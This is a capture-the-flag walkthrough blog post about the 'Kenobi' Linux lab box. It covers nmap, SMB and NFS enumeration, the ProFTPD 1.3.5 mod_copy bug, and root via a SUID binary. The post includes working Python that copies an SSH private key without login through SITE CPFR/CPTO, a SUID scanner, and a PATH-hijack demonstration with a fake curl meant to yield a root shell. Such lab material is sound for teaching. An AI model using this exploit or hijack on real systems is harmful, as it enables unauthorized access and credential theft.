Kenobi

Stacey Landrum
Mar 2, 2023


Walkthrough on exploiting a Linux machine: enumerate Samba for shares, abuse a vulnerable version of ProFTPD, and escalate privileges through PATH manipulation.

This room covers accessing a Samba share, using a vulnerable ProFTPD build to gain initial access, and escalating to root via an SUID binary.

Let’s start with an nmap scan (default scripts plus version detection).

root@ip-10-10-115-20:~# nmap -sC -sV 10.10.86.151

Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-02 00:13 GMT
Nmap scan report for ip-10-10-86-151.eu-west-1.compute.internal (10.10.86.151)
Host is up (0.0028s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 50987/udp mountd
| 100005 1,2,3 51647/tcp mountd
| 100021 1,3,4 43729/udp nlockmgr
| 100021 1,3,4 44779/tcp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 02:97:9E:21:9A:33 (Unknown)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2023-03-01T18:13:45-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-03-02 00:13:45
|_ start_date: 1600-12-31 23:58:45

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

We can use nmap’s SMB NSE scripts (smb-enum-shares and smb-enum-users against port 445) to enumerate SMB; the scan above already shows that a guest session is accepted. We find three shares.

smbclient, listing shares as an anonymous user, shows the same three.

Let’s see what files are in the share we can read.

log.txt mentions an RSA key and a user named kenobi, so an SSH private key for that account probably exists on the box.

What NFS exports are visible? The scan showed nfs on port 2049, and the server exports /var.

The scan already told us the ProFTPD version, 1.3.5, and connecting to port 21 shows the same banner. That release ships the mod_copy module, whose SITE CPFR and SITE CPTO commands copy files server-side, and in 1.3.5 they are accepted before any login (CVE-2015-3306). So an anonymous client can copy any file the FTP daemon can read into a location we can reach, such as the NFS-exported /var.

We can find the published exploits for this version using searchsploit.
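The control-channel exchange behind that copy, as an added example in Python (not code from the original post). The source path /home/kenobi/.ssh/id_rsa and the destination /var/tmp/id_rsa are assumptions; fake_proftpd is a constructed stand-in for the vulnerable daemon so the client can be exercised offline, and it mimics mod_copy's real reply codes (350 after CPFR, 250 after CPTO, 550 when the source does not exist).

```python
"""Added example: copy a file server-side through ProFTPD 1.3.5's mod_copy
(SITE CPFR / SITE CPTO, honoured before login in that release, CVE-2015-3306).
Paths are assumptions about the Kenobi box, not something the post prints."""
import socket
import threading

SRC_KEY = "/home/kenobi/.ssh/id_rsa"   # assumed location of the key log.txt hints at
DST_KEY = "/var/tmp/id_rsa"            # /var is NFS-exported, so this becomes readable


def _recv_line(f):
    line = f.readline()
    if not line:
        raise ConnectionError("server closed the connection")
    return line.decode("utf-8", "replace").rstrip("\r\n")


def _cmd(sock, f, line):
    """Send one FTP command, return (numeric code, full reply line)."""
    sock.sendall((line + "\r\n").encode())
    reply = _recv_line(f)
    return int(reply[:3]), reply


def copy_via_mod_copy(host, port, src=SRC_KEY, dst=DST_KEY, timeout=5):
    """Drive the two SITE commands; return the transcript, raise if a step is refused."""
    transcript = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        f = sock.makefile("rb")
        banner = _recv_line(f)
        transcript.append(("<connect>", banner))
        if not banner.startswith("220"):
            raise RuntimeError("unexpected banner: " + banner)
        # No USER/PASS: the bug is that mod_copy never checks for a logged-in session.
        for line, expected in (("SITE CPFR " + src, 350), ("SITE CPTO " + dst, 250)):
            code, reply = _cmd(sock, f, line)
            transcript.append((line, reply))
            if code != expected:
                raise RuntimeError(f"{line!r} refused: {reply}")
        _cmd(sock, f, "QUIT")
    return transcript


def fake_proftpd(store, bind="127.0.0.1"):
    """Constructed stand-in for the vulnerable daemon (not real ProFTPD code).
    `store` maps path -> bytes; CPFR/CPTO copy entries inside it. Returns (port, thread)."""
    srv = socket.socket()
    srv.bind((bind, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn, conn.makefile("rb") as f:
            conn.sendall(b"220 ProFTPD 1.3.5 Server ready.\r\n")
            pending = None
            while True:
                raw = f.readline()
                if not raw:
                    break
                verb, _, arg = raw.decode().rstrip("\r\n").partition(" ")
                if verb == "SITE" and arg.upper().startswith("CPFR "):
                    path = arg[5:]
                    if path in store:
                        pending = path
                        conn.sendall(b"350 File or directory exists, ready for destination name\r\n")
                    else:
                        conn.sendall(b"550 " + path.encode() + b": No such file or directory\r\n")
                elif verb == "SITE" and arg.upper().startswith("CPTO "):
                    if pending is None:
                        conn.sendall(b"503 Bad sequence of commands\r\n")
                    else:
                        store[arg[5:]] = store[pending]
                        pending = None
                        conn.sendall(b"250 Copy successful\r\n")
                elif verb == "QUIT":
                    conn.sendall(b"221 Goodbye.\r\n")
                    break
                else:
                    conn.sendall(b"530 Please login with USER and PASS\r\n")
        srv.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return port, t


def demo():
    """Happy path against the stand-in: the key ends up under /var/tmp."""
    store = {SRC_KEY: b"-----BEGIN RSA PRIVATE KEY-----\n(constructed sample)\n"}
    port, t = fake_proftpd(store)
    transcript = copy_via_mod_copy("127.0.0.1", port)
    t.join(2)
    return store, transcript


def demo_missing():
    """Same exchange when the source does not exist: CPFR is refused with 550."""
    port, _ = fake_proftpd({})
    try:
        copy_via_mod_copy("127.0.0.1", port)
    except RuntimeError as e:
        return str(e)
    return None
```

Against the real box the same two SITE commands can be typed into any FTP client after the banner; the client above just makes the expected reply codes explicit so a refusal is caught instead of silently continuing to the NFS mount.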

We need the SSH key, so let’s mount the exported /var on our machine and look in its tmp directory.

mkdir /mnt/kenobiNFS
sudo mount 10.10.86.151:/var /mnt/kenobiNFS

Let’s list the files under the mount.

Copy the RSA key (id_rsa) to our machine.

Restrict its permissions, or ssh will refuse to use the key.

chmod 600 id_rsa

Now that we have the private key we can log in as kenobi via SSH (pass the key with the -i option).

Let’s look for the user flag.

Privilege Escalation with Path Variable Manipulation

SUID bits can be dangerous. Some binaries, such as passwd, need to run with elevated privileges (it edits the system password database), but custom binaries carrying the SUID bit can lead to all sorts of issues.

Usually I would run sudo -l to look for escalation routes, but that requires kenobi’s password, which we don’t have.

Instead we search for SUID binaries: files that execute with the privileges of their owner, so a root-owned one runs as root no matter who launches it.

Let’s run some of the unfamiliar binaries to see what they do.
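The SUID hunt done programmatically, as an added example in Python (not from the post): it walks the tree the way `find / -perm -u=s -type f` does and separates stock setuid helpers from unexpected ones. EXPECTED_SUID is an assumed baseline for an Ubuntu 16.04 box and should be trimmed to the target’s package set; demo() builds a constructed tree with a look-alike passwd and a custom menu binary instead of scanning the real root.

```python
"""Added example: find setuid regular files and flag the ones outside a known baseline."""
import os
import stat
import tempfile

# Assumed baseline of stock setuid helpers on Ubuntu 16.04; adjust per target.
EXPECTED_SUID = {
    "passwd", "sudo", "su", "chsh", "chfn", "gpasswd", "newgrp", "mount", "umount",
    "ping", "ping6", "pkexec", "fusermount", "ssh-keysign", "dbus-daemon-launch-helper",
}


def find_suid(root="/"):
    """Yield (path, stat) for regular files with the setuid bit; unreadable dirs are skipped."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        # Pseudo-filesystems are noisy and hold nothing on disk; do not descend.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: a symlink's own mode is irrelevant
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st


def classify(root="/"):
    """Return (stock, suspicious). suspicious entries are (path, owned_by_root)."""
    stock, suspicious = [], []
    for path, st in find_suid(root):
        if os.path.basename(path) in EXPECTED_SUID:
            stock.append(path)
        else:
            suspicious.append((path, st.st_uid == 0))
    return stock, suspicious


def demo():
    """Constructed tree: passwd and a custom menu get u+s, ls does not."""
    root = tempfile.mkdtemp()
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name in ("passwd", "menu", "ls"):
        p = os.path.join(bindir, name)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(p, 0o755)
    os.chmod(os.path.join(bindir, "passwd"), 0o4755)
    os.chmod(os.path.join(bindir, "menu"), 0o4755)
    return classify(root)
```

The owner flag matters: a setuid file owned by an unprivileged user is a lateral-movement aid at best, while a root-owned one outside the baseline is the thing to pull apart with strings next.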

We can use strings to see which commands the program calls. The menu binary invokes curl, uname and ifconfig by bare name rather than by full path, so it relies on whatever PATH the caller supplies, and we can try path hijacking.

We prepend /tmp to PATH so that the lookup for those names hits /tmp first.

We create a file named curl in /tmp whose contents launch a shell, and make it executable.

Now when we run the menu binary, its call to curl runs our file instead, and because the binary is SUID root the shell runs as root, so we can read the root flag. If the payload is bash rather than sh, start it with -p; otherwise bash drops the effective uid back to the caller’s.
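The whole chain against a stand-in, as an added example in Python (not code from the post). MENU_STRINGS is a constructed imitation of what strings printed, the victim is a subprocess call that runs an assumed command line, `curl -I localhost`, through the shell the way the SUID binary would, and the fake curl writes a marker file instead of spawning a shell so the block is safe to run anywhere.

```python
"""Added example: spot PATH-dependent command names in a binary, show how the shell
resolves them, and reproduce the hijack against a harmless stand-in for menu."""
import os
import re
import subprocess
import tempfile

# Constructed imitation of `strings menu`: three bare names and one absolute path.
MENU_STRINGS = b"\x7fELF\x00\x00curl -I localhost\x00uname -r\x00ifconfig\x00/usr/bin/id\x00"


def printable_strings(blob, minlen=4):
    """What strings(1) prints: runs of printable ASCII at least minlen long."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % minlen, blob)]


def unqualified_commands(blob):
    """Command strings whose program name is not an absolute path: hijackable via PATH."""
    out = []
    for s in printable_strings(blob):
        prog = s.split()[0]
        if not prog.startswith("/") and re.fullmatch(r"[a-z0-9_.-]+", prog):
            out.append(prog)
    return out


def resolve(cmd, path):
    """First executable regular file named cmd along PATH, as the shell searches it."""
    for d in path.split(os.pathsep):
        candidate = os.path.join(d, cmd)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def hijack_demo():
    """Drop a fake curl in a scratch dir, prepend it to PATH, run the menu stand-in."""
    work = tempfile.mkdtemp()          # plays the role of /tmp on the box
    marker = os.path.join(work, "hijacked")
    fake = os.path.join(work, "curl")
    with open(fake, "w") as fh:
        # On the box this line would be /bin/sh (or bash -p); here it just leaves a marker.
        fh.write(f"#!/bin/sh\necho $(id -u) > {marker}\n")
    os.chmod(fake, 0o755)
    env = dict(os.environ, PATH=work + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin"))
    # Stand-in for the SUID binary: it hands an unqualified name to the shell (assumed cmd line).
    subprocess.run("curl -I localhost >/dev/null 2>&1", shell=True, env=env, check=False)
    return {"resolved": resolve("curl", env["PATH"]),
            "fake": fake,
            "marker_written": os.path.exists(marker)}
```

The defensive reading is the same code run backwards: a setuid program should either exec absolute paths or reset PATH to a fixed value before calling out, since anything found by unqualified_commands is controlled by whoever sets the caller’s environment.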

There are other avenues to check. Since the box serves a web app, we can visit the site.

Nothing to see there. Always check robots.txt; the scan already flagged its one disallowed entry, /admin.html.

I guess they didn’t want us to waste our time here LOL!


Cybersecurity analyst with a CySA+ certification and a background in accounting. Passionate about protecting digital assets & staying ahead of emerging threats.